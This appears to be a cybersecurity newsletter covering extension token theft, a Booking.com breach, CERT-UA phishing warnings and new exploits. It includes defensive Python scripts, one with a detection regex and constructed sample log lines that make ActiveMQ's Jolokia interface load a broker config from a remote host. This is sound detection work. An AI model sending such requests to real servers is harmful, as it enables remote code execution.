The Lyceum: Cyber Intelligence Daily — Apr 15, 2026
Wednesday, April 15, 2026
The Big Picture
One hundred eight browser extensions have been stealing Google account tokens from the official Chrome Web Store for up to four years — and as of this morning, they're still there. Booking.com confirmed a reservation-data breach, amid a wave of phishing so convincing it knows your hotel name and check-in date. CERT-UA posted an afternoon warning that Russian-linked attackers are intensifying campaigns against Ukrainian hospitals using fake humanitarian-aid emails. And underneath all of it, a pattern: fresh public exploit code for a Fortinet WAF, a CVSS-10.0 React flaw, and an Apache Tomcat RCE all surfaced within hours of each other, compressing the gap between "disclosed" and "weaponized" to nearly zero.
What Just Dropped
- CVE-2026-21643 — Fortinet FortiClient EMS: actively exploited; CISA KEV remediation deadline for federal civilian agencies is tomorrow (April 16). CVSS not yet scored in NVD; operational maturity confirmed. Patch now or document why you haven't.
- CVE-2026-32201 — Microsoft SharePoint Server: added to CISA KEV; actively exploited. Operational maturity. Remediation deadline for federal civilian agencies is April 28.
- CVE-2023-21529 — Microsoft Exchange Server: added to CISA KEV; actively exploited. Storm-1175 attributed. Operational maturity. Remediation deadline for federal civilian agencies is April 27.
- CVE-2025-24813 PoC — Apache Tomcat RCE: automated proof-of-concept exploit published to GitHub within the last 24 hours, with a reported 99.4% success rate in testing. Not yet in mass-exploitation toolkits, but the barrier to entry just dropped to "download and run."
- FortiWeb 8.0.2 RCE PoC — Fortinet FortiWeb WAF: raw exploit code uploaded to Exploit-DB today. No public CVE or vendor patch confirmed yet. Perimeter appliance — treat as urgent.
- React2Shell fresh Exploit-DB entry — React Server 19.2.0 RCE (CVE-2025-55182, CVSS 10.0, KEV, ransomware-linked): new public exploit indexed today. Google GTIG has documented China-nexus exploitation since December. Over 968,000 exposed instances per Palo Alto Networks.
- CVE-2026-33579 — OpenClaw AI agent platform: privilege escalation, VulnCheck CVSS 9.9. Fixed in version 2026.3.28. NVD record enriched; no longer just GitHub chatter.
Today's Stories
108 Chrome Extensions Are Stealing Your Google Account Right Now — And Google Hasn't Pulled Them Yet
If you've installed a Telegram sidebar, a slot-machine game, or a YouTube enhancer from the Chrome Web Store recently, there's a real chance it's been quietly looting your accounts in the background.
Application security firm Socket discovered 108 malicious extensions — still live in the official Chrome Web Store as of this morning — that steal Google OAuth2 Bearer tokens, deploy backdoors, and run ad fraud, all sharing the same command-and-control infrastructure. An OAuth2 Bearer token is essentially a master key: whoever holds it can access your Google account without needing your password or two-factor code. According to BleepingComputer, Socket found code comments pointing to a Russian malware-as-a-service operation, and CyberNews reports the shared C2 domain, cloudapi[.]stream, was registered in April 2022 — consistent with a campaign that may have been active for roughly four years before discovery.
The extensions fall into five categories — Telegram sidebar clients, slot machines, YouTube/TikTok enhancers, translation tools, and browser utilities — and all work as advertised on the surface. The most severe, "Telegram Multi-account," exfiltrates the victim's active Telegram Web session every 15 seconds, according to CyberNews. Forty-five of the extensions contain a universal backdoor that opens arbitrary URLs on browser start, meaning the attacker can push new commands to any infected browser without user interaction. Socket estimates roughly 20,000 total installs across the set.
What changes if Google doesn't act fast: every day these extensions remain live demonstrates that a single actor can defeat the Web Store's review process at scale for years. That's an invitation for copycats. If the extensions are still available by end of day April 16, the Web Store's automated review has a structural gap that other operators will exploit.
What to do now: Socket published the full list of malicious extension IDs. Remove any matches immediately. If you used the Telegram extension, terminate all other Telegram Web sessions from your mobile app (Settings → Devices). If you signed into any of these extensions with Google, review third-party app access at myaccount.google.com/permissions and revoke unfamiliar entries.
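For teams that need to check many machines rather than one browser, the following script is an added example (not Socket's tooling and not Google's) that audits a Chrome profile directory against a blocklist of extension IDs. It assumes Chrome's on-disk layout of Extensions/<id>/<version>/manifest.json; the blocklist IDs and the sample profile it builds are constructed placeholders, so substitute Socket's published list before running it for real.

```python
"""Audit a Chrome profile's installed extensions against a blocklist of IDs.

Added example, not Socket's or Google's code. Assumes Chrome's on-disk layout:
<profile>/Extensions/<extension-id>/<version>/manifest.json. The blocklist
below is a constructed placeholder; replace it with the published ID list.
"""
import json
import re
import tempfile
from pathlib import Path

# Chrome extension IDs are 32 characters drawn from the letters a-p.
EXTENSION_ID_RE = re.compile(r"^[a-p]{32}$")

# Constructed placeholder IDs standing in for the real blocklist (assumption).
SAMPLE_BLOCKLIST = frozenset({
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab",
    "ccccccccccccccccccccccccccccccdd",
})


def installed_extensions(profile_dir):
    """Yield (extension_id, version, name) for every extension folder with a manifest."""
    ext_root = Path(profile_dir) / "Extensions"
    if not ext_root.is_dir():
        return
    for ext_dir in sorted(ext_root.iterdir()):
        ext_id = ext_dir.name
        if not EXTENSION_ID_RE.match(ext_id):
            continue  # not an extension folder (Chrome keeps e.g. a "Temp" dir here)
        for ver_dir in sorted(p for p in ext_dir.iterdir() if p.is_dir()):
            manifest = ver_dir / "manifest.json"
            if not manifest.is_file():
                continue
            try:
                # "name" may be an i18n placeholder (__MSG_...); it is reported as-is.
                name = json.loads(manifest.read_text(encoding="utf-8")).get("name", "?")
            except (json.JSONDecodeError, OSError):
                name = "?"
            yield ext_id, ver_dir.name, name


def find_flagged_extensions(profile_dir, blocklist):
    """Return the installed extensions whose ID appears in the blocklist."""
    return [(i, v, n) for i, v, n in installed_extensions(profile_dir) if i in blocklist]


def build_sample_profile(root):
    """Construct a fake profile: one blocklisted extension, one benign, one junk folder."""
    layout = {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab": ("1.4.2", "Telegram Sidebar (sample)"),
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": ("3.0.0", "Benign Notes (sample)"),
    }
    for ext_id, (version, name) in layout.items():
        d = Path(root) / "Extensions" / ext_id / version
        d.mkdir(parents=True)
        d.joinpath("manifest.json").write_text(
            json.dumps({"name": name, "version": version, "manifest_version": 3}),
            encoding="utf-8",
        )
    (Path(root) / "Extensions" / "Temp").mkdir()  # must be ignored by the scan
    return root


def demo_audit():
    """Build the constructed profile in a temp dir and return the flagged extensions."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_profile(tmp)
        return find_flagged_extensions(tmp, SAMPLE_BLOCKLIST)


if __name__ == "__main__":
    # Real use: point at a profile, e.g. ~/.config/google-chrome/Default (Linux).
    for ext_id, version, name in demo_audit():
        print(f"FLAGGED {ext_id} v{version}: {name}")
```

Removing a flagged folder is not enough on its own: the extension may already have exfiltrated a token, so the revocation step at myaccount.google.com/permissions still applies to every match.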
Your Booking.com Reservation Just Became a Phishing Weapon
● Dubai, UAE
If you have an upcoming trip booked through Booking.com, you're about to receive some very convincing messages from people who are not your hotel.
Booking.com confirmed to BleepingComputer that hackers accessed customer data tied to reservations — names, email addresses, phone numbers, and booking details. The company forced PIN resets and notified affected users directly. TechCrunch corroborated the confirmation. Financial data was not taken, according to the company. Booking.com has over 100 million active mobile app users and more than 500 million monthly website visits, per CyberNews, so even a partial breach creates an enormous phishing surface.
The real danger is temporal. As SOSRansomware's analysis noted, travel booking data is uniquely weaponizable because of its time dimension: as a departure date approaches, the fear of a cancelled reservation pushes travelers to react before thinking. Scammers concentrate phishing attempts in the days before a trip — the precise moment when vigilance gives way to haste. Help Net Security reports that Dubai-based cybersecurity firm Hackmanac says the Vect hacking group claimed breaches at both Booking.com and Airbnb, though neither claim is confirmed. Russian outlet Xakep.ru reported early samples and claims that partial reservation records had surfaced on dark-web forums, a detail still being verified against Booking.com's statement that financial data was not accessed.
What failure looks like: if Booking.com doesn't disclose the breach scope and attack vector within the next week, defenders are flying blind — and the phishing wave will outrun the company's damage control. The observable signal is whether leaked reservation samples appear on marketplaces. If they do, every travel platform becomes a target.
Practical steps: Treat any payment request arriving by email, WhatsApp, or SMS about a Booking.com reservation as fraudulent. The company says it never requests bank details through those channels. Add travel-themed indicators to your phishing filters now.
CERT-UA: Hospitals and Local Governments Are Under Intensifying Attack — Humanitarian Aid Emails Are the Lure
● Ukraine · Russia
Ukraine's national cybersecurity agency posted a warning today that should matter to anyone tracking how Russia targets civilian infrastructure — and to any organization that receives emails about humanitarian aid.
CERT-UA's official Telegram channel posted at 14:13 UTC today — hours before the formal advisory — that attacks on local self-government bodies and especially healthcare facilities increased sharply during March and April 2026. The advisory, tracking threat cluster UAC-0247, documents a specific playbook: attackers email targets under the guise of discussing humanitarian-aid proposals, direct them to download an archive, and install malware. Posting to the channel ahead of the written advisory is consistent with CERT-UA's pattern of using Telegram as an early-warning mechanism.
What's new isn't the tactic — Russia-linked actors have exploited wartime aid urgency before — but the escalation in scope. The advisory explicitly names healthcare facilities and FPV-drone operators as targets, meaning adversaries are gathering tactical intelligence on frontline drone deployments and medical logistics — information with direct battlefield value. UAC-0247 is the fourth new Ukrainian threat cluster designation in the past week (joining UAC-0239, UAC-0241, and UAC-0245), a pace that signals either a genuine increase in Russian cyber operations tempo or a deliberate CERT-UA effort to publicly attribute campaigns previously tracked internally.
No ransomware detonations have been observed in UAC-0247's activity — current payloads focus on espionage and access. The signal to watch: whether UAC-0247 TTPs appear outside Ukraine. CERT-UA advisories on Russian campaigns have historically preceded similar operations against EU member states by weeks.
Actionable now: Brief email-filtering teams to flag aid-themed lures. Block archive downloads from unknown senders. Treat unsolicited "humanitarian coordination" emails with heightened skepticism.
A Weaponized Exploit for Apache Tomcat Just Dropped on GitHub
If your organization runs Java applications, the window to patch quietly just closed.
A fully automated proof-of-concept exploit for CVE-2025-24813, a critical remote code execution vulnerability in Apache Tomcat, appeared on GitHub within the last 24 hours. The Python script reportedly achieves a 99.4% success rate in testing, effectively lowering the barrier from "sophisticated attacker" to "anyone who can run a script." Apache Tomcat is one of the most widely deployed Java web servers in the world — it powers everything from internal business applications to customer-facing portals.
This matters because of what typically happens next. The lifecycle is predictable: PoC published → integrated into scanning tools within days → picked up by initial access brokers within a week → ransomware operators buying that access within two weeks. We're at step one. The observable signal that this has escalated is mass-scanning activity on Tomcat management ports — if GreyNoise or Shadowserver report a spike, the clock has moved from "patch prudently" to "patch now or explain the incident."
Separately, Xakep.ru reported today that Apache patched CVE-2026-34197 in Apache ActiveMQ Classic — an RCE flaw that sat unnoticed for 13 years, exploitable via the Jolokia management interface to load remote Spring XML files and execute system commands. Horizon3 researchers, cited by Xakep.ru, say they haven't seen real-world exploitation yet. If you run ActiveMQ Classic, patch to versions 5.19.4 or 6.2.3 and hunt for unexpected brokerConfig=xbean:http:// fetches in your logs.
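To make the suggested log hunt concrete, here is an added detection example (not Horizon3's research code and not part of Apache ActiveMQ) that scans web-console access-log lines for the brokerConfig=xbean:http:// indicator named above. It assumes a combined-format access log from the console's Jetty front end, decodes URL-encoded paths before matching so a percent-encoded variant is not missed, and additionally flags Jolokia requests from sources outside an allowlist you supply. Every log line below is constructed, not captured.

```python
"""Hunt an ActiveMQ web-console access log for remote broker-config fetches.

Added detection example, not Horizon3's or Apache's code. Assumes a
combined-format access log (Jetty style) from the console; the sample lines
are constructed for the demo and are not real captures.
"""
import re
from urllib.parse import unquote

# src - user [timestamp] "METHOD path HTTP/x" status bytes
ACCESS_LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
# The indicator from the advisory: a broker config pulled from a remote URL.
REMOTE_XBEAN_RE = re.compile(r"brokerConfig=xbean:(https?|ftp)://", re.IGNORECASE)


def fully_unquote(s, rounds=3):
    """Undo nested percent-encoding (bounded) so encoded indicators still match."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def inspect_line(line, trusted_sources=frozenset()):
    """Return a finding dict for a suspicious line, or None if it looks benign."""
    m = ACCESS_LINE_RE.match(line)
    if not m:
        return None  # not an access-log line we understand
    path = fully_unquote(m["path"])
    findings = []
    if REMOTE_XBEAN_RE.search(path):
        findings.append("remote-xbean-config")
    if "/api/jolokia" in path.lower() and m["src"] not in trusted_sources:
        findings.append("jolokia-from-untrusted-source")
    if not findings:
        return None
    return {"src": m["src"], "ts": m["ts"], "method": m["method"],
            "path": path, "findings": findings}


def hunt(lines, trusted_sources=frozenset()):
    """Run inspect_line over an iterable of log lines and keep the hits."""
    return [r for r in (inspect_line(l, trusted_sources) for l in lines) if r]


# Constructed sample log (assumption: 10.0.0.5 is the trusted admin host).
SAMPLE_LOG = [
    '10.0.0.5 - admin [15/Apr/2026:09:12:01 +0000] "GET /api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Apr/2026:09:13:44 +0000] "GET /api/jolokia/?brokerConfig=xbean:http://198.51.100.9/config.xml HTTP/1.1" 200 88',
    '203.0.113.7 - - [15/Apr/2026:09:13:59 +0000] "GET /api/jolokia/?brokerConfig%3Dxbean%3Ahttp%3A%2F%2F198.51.100.9%2Fc.xml HTTP/1.1" 200 88',
    '10.0.0.5 - admin [15/Apr/2026:09:15:10 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 4096',
    'this line is not an access-log entry',
]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG, trusted_sources=frozenset({"10.0.0.5"})):
        print(hit["ts"], hit["src"], hit["method"], ",".join(hit["findings"]), hit["path"])
```

On real data, feed the console access log through hunt() and treat any remote-xbean-config hit as an incident regardless of source; the Jolokia-from-untrusted-source rule is the lower-confidence signal and mainly tells you whether the management interface is reachable from where it should not be.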
⚡ What Most People Missed
- A Five Eyes joint advisory warns of active exploitation of a Cisco SD-WAN authentication bypass (CVE-2026-20127). CISA, NSA, ASD, CCCS, NCSC-NZ, and NCSC-UK coordinated the warning — six agencies don't do that for theoretical risks. Attackers are chaining the fresh bypass with CVE-2022-20775 for privilege escalation. SD-WAN connects branch offices and cloud environments across entire enterprises; compromise here means visibility into an organization's distributed network traffic.
- CISA added VMware Aria Operations (CVE-2026-22719) to the KEV catalog. Aria Operations is the monitoring layer that watches your VMs, Kubernetes clusters, and cloud spend. Command injection in the thing that watches everything else is a particularly efficient way to establish persistent, high-visibility access.
From the Foreign Press
Fake Ledger Live App Stole $9.5 Million Through Apple's App Store
Xakep.ru reported today that attackers bypassed Apple's app review process with a polished counterfeit of Ledger Live — the legitimate companion app for Ledger hardware cryptocurrency wallets. Users who downloaded the fake and entered their recovery phrases handed total control of their hardware wallets to the attackers, resulting in $9.5 million stolen before Apple removed the application. Xakep's account notes the fake app used fabricated positive reviews and a convincing UI, and that exfiltration occurred gradually over days to weeks rather than in a single transaction. The vector — Apple's curated App Store, not a sideloaded download — undercuts the assumption that walled gardens are immune to supply-chain impersonation.
Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.
Apache ActiveMQ's 13-Year-Old RCE Bug Finally Patched
Xakep.ru, citing Horizon3 research, reported that CVE-2026-34197 (CVSS 8.8) affects Apache ActiveMQ Classic before 5.19.4 and versions 6.0.0 through 6.2.3. The flaw allows remote code execution via the Jolokia management interface by loading a remote Spring XML file during broker initialization. In versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) removes the authentication barrier entirely. Apache released fixes on March 30. Horizon3 says no real-world exploitation has been observed yet, but the 13-year dwell time in the codebase makes this a reminder that old software has a very long memory.
Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.
Chrome Use-After-Free Vulnerability Technical Breakdown
Xakep.ru published a detailed technical analysis of a recent use-after-free vulnerability in Chrome's rendering engine — the class of memory-corruption bug that has historically been the most common vector for Chrome zero-day exploitation. The article walks through the exploit mechanics, heap manipulation techniques, and how Chrome's memory-safety mitigations interact with this specific flaw class. While not tied to a named active campaign, the analysis provides defenders and red-teamers with concrete indicators of what exploitation of this bug class looks like in practice.
Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.
📅 What to Watch
- If the 108 malicious Chrome extensions are still live by end of day April 16, expect dozens of lookalike extensions and a rapid spike in OAuth token-theft campaigns within days, forcing mass revocation of third-party app access and credential resets across impacted accounts.
- If leaked Booking.com reservation samples appear on dark-web marketplaces, expect highly targeted phishing messages that include reservation IDs, property names, and payment-redirection scams, increasing the success rate of credential and payment-fraud attempts against travelers.
- If mass-scanning spikes on Apache Tomcat management ports appear in GreyNoise or Shadowserver data, the CVE-2025-24813 PoC has crossed from research to operational use — anticipate rapid exploitation of exposed management consoles, webshell deployment, and follow-on ransomware initial access.
- If UAC-0247's humanitarian-aid phishing TTPs appear outside Ukraine, it signals the campaign has expanded to EU member states and may presage credential harvesting targeted at NGOs and humanitarian organizations, requiring cross-border incident sharing and mitigation coordination.
- If Fortinet issues no advisory for the FortiWeb 8.0.2 PoC within 48 hours, assume exploitability and immediately isolate FortiWeb management interfaces, harden WAF rules, and increase monitoring for anomalous admin sessions and configuration changes.
The Closer
One hundred eight browser extensions stealing your Google tokens for four years while Google's review bots napped; a travel platform's reservation data turning every upcoming hotel stay into a personalized phishing lure; and a 13-year-old Apache bug finally getting patched, presumably after finishing middle school.
The fake Ledger app made $9.5 million through Apple's walled garden — turns out the wall has a gift shop.
Eyes open. Patches applied. Extensions audited.
If someone you know runs Chrome extensions, Tomcat servers, or upcoming travel reservations — so, everyone — forward this their way.